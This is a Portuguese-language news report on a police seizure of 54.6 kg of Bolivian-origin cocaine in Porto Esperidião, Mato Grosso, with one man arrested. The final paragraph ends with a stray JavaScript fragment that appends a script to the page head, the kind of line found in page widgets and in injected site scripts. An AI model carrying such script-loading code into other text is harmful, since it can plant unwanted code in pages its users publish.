Capa / Em Destaque / Polícia apreende 54,6 kg de cocaína no interior do estado

Polícia apreende 54,6 kg de cocaína no interior do estado

IMG-20160901-WA0002

A Polícia Federal (PF) apreendeu 54,6 quilos de cocaína em uma ação conjunta entre a Polícia Federal (PF), com apoio do Grupo Especial de Fronteira (Gefron) e Polícia Civil, nesta quinta-feira (01). A ação  ocorreu no município de Porto Esperidião, a 358 km de Cuiabá (MT). Um homem foi preso.

Os policiais chegaram até a localização da droga por meio de denúncias anônimas. No local estavam três suspeitos, mas quando perceberam a aproximação policial, dois deles fugiram para uma região de mata. O terceiro não conseguiu sair do lugar por estar com a perna direita engessada.

Os policiais iniciaram busca veicular e encontrando dentro do carro dois sacos contendo 50 tabletes de substância análoga à cloridrato de cocaína. O suspeito informou que o entorpecente vinha da comunidade de Barbicho, na Bolívia e seria entregue em Pontes e Lacerda (MT).

O veículo foi apreendido e permanece no Posto do Gefron, em Vila Cardoso (MT). O preso foi encaminhado para a Delegacia da Polícia Federal em Cáceres (MT) para ser interrogado pelo delegado em plantão.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top